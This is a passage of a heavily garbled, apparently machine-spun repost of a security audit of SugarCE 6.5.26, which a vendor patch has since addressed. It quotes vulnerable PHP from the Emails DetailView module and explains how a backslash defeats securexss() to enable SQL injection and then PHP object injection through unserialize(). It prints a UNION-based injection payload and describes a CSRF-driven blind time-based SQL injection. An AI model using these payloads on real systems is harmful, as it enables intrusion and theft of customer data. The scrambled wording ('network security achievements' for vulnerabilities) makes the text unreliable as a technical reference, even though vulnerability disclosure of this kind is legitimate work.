SugarCRM new vulnerability is reproducible,a hacker attacker or can remote steal customer information data-vulnerability warning-the black bar safety net

ID MYHACK58:62201789461
Type myhack58
Reporter 佚名
Modified 2017-09-25T00:00:00


SugarCRM audit a variety of network security achievements SugarCRM is more than a hotspot a customer relationship governance check-in Solution, and SugarCRM now important to have two major versions, that is necessary to pay the trade Edition and open source Community Edition, the eras of all there is across a hundred and twenty countries and regions of more than two million since the force user is the application SugarCRM to governance of sensitive customer data. What, then on the front soon, have a network security researchers declared called SugarCRM code exists in multiple network security achievements, and SugarCRM network security exemplary accomplishments has gradually attracted the community in the rest of the network security researchers ' attention. To that end, SugarCRM also announced a new version to handle this in the presence of network security achievements. We previously had to code to stop a manual audit, but we also hope to see our automation code elucidating tips RIPS【reference】can to software of network security brought how into the offer with. Via the process of elucidating, let's scan a few exceptions serious of network security achievements, and these network security flaws vulnerability bug will allow the intrusion of attackers from the server, steal customer data or other sensitive files. We apply the RIPS elucidating The of open-source SugarCE version latest version 6. 5. 26, the version and the trade version of SugarCRM share the Foundation code, we in eight minutes or less for all 816519 lines of code and software the data stream to stop the network security of elucidating it. Next, we will in this article give everyone the first volume of this most interesting of several found. Necessary to pay attention that we will ever coherent results reported to the manufacturer, and the manufacturer has now fixed herein relates to network security performance via the process of updating the patch. Multi-step PHP tools injection flaws vulnerability bug RIPS the detection of the most serious network security flaws vulnerability bug present in the DetailView of the module. In the vast majority of cases, SugarCRM only application securexss()function to avoid invasion attackers to bypass the SQL template constants and injected into the non-pre-SQL statement. This function is hard to use a responsive HTML entity swap out the statement in single quotation marks, and avoid the injection. What, then, securexss()function will not swap the output statement of the backslash character. Therefore, in addition to the application a backslash to bypass the securexss()except that we also found to previously existXSSaccomplishments, next we all the way to see these results if any from the SQL check statement: modules/Emails/DetailView.php $parent_id = $_REQUEST['parent_id']; // cn: bug 14300 - emails_beans schema refactor - fixing query $query="SELECT * FROM emails_beans WHERE email_id='{$focus->id}' AND bean_id='{$parent_id}' AND bean_module = '{$_REQUEST['parent_module']}' " ; $res=$focus->db->query($query); $row=$focus->db->fetchByAssoc($res); if (! empty($row)) { $campaign_data = $row['campaign_data']; $macro_values = array(); if (! empty($campaign_data)) { $macro_values = unserialize(from_html($campaign_data)); } } In the DetailView of the module, the questioned statement is the application of user output data static build born, this in the single quotation marks are reversed end Exchange disposal. If the user supplied data is not a malicious Trojan virus data, then the abnormal build out the SQL check statement follows. On top of this questioning statement, the single quotes within the string will be translated into the SQL string:

SELECT * FROM emails_beans WHERE email_id='123' AND bean_id='abc' AND bean_module='def' What, then, if we bean_id at the beginning of the sector to increase by a backslash character, it will produce what?

SELECT * FROM emails_beans WHERE email_id='123' AND bean_id='abc\' AND bean_module='def' In this case, the second AND the premise will be bean_id inner string to filter out, is bean_id inner content will be extended to the rest of the SQL statement, the next single quotation mark before, and is bean_module the later value will lead to the user can be restrained. At this time, the invasion of the attacker will be able to perhaps in the not to damage the previous single quotes the case of the bet into the arbitrary whims of the SQL statement, and in this case SugarCRM the subordinate network security protection pace will also be bypassed. (sugarcrm-sa-2017-006) In addition to this, the SQL check statement is eligible to get the campaign_data is to overturn the last unserialize()function to dispose of, and this will trigger a PHP tool injection flaws vulnerability bug, which is a very serious network security achievements, I in our previous article had also repeated a comment the debate over repeatedly. 【Resources】【reference two] SELECT * FROM emails_beans WHERE email_id='123' AND bean_id='abc\' AND bean_module=' UNION ALL SELECT 1,2,3,4,CHAR(76,76),6,7 FROM emails_beans LIMIT 1 -- x' CSRF + SQL blind injection Before the first volume of theSQL injectionflaws vulnerability bugs and we declared anotherSQL injectionflaws vulnerabilities bugs only via the process of a useful user session to stop the visit. In addition to these two flaws vulnerabilities bugs outside, we also found a SQL blind injection flaws vulnerability bug, which also means that we will not in the HTML response page to see the SQL response information or any error alert. However, the invasion of the attacker can be in does not want to receive any user credentials in the case of the rear shield long-haul applications the flaws vulnerabilities bugs implementation of intrusion attacks, intrusion attackers does not then go on to trick users into visiting a malicious Trojan virus Web page and obtain the user's legitimate credentials. Given above is a malicious Trojan virus page demo samples: Video location: In our demonstration example, we apply the JavaScript to a static load up a picture, and its URL property points to the object set in order to SugarCRM means French, which will allow the invasion of the attacker to authenticate the user name sent to entreat it. The URL property will include a SQL Payload, and the back-end sends an instruction to the early database of the sector content of the response. SQL questioning the response time is a bit invasion of the attacker is required to go to identify the content, we also used in our PoC demonstrates how to from the based on the time of theSQL injectionto extract useful information. Here necessary to note that, the information extraction rate is possible via the process optimization to obtain a substantial promotion. Certification documents leak VictorySQL injection

[1] [2] next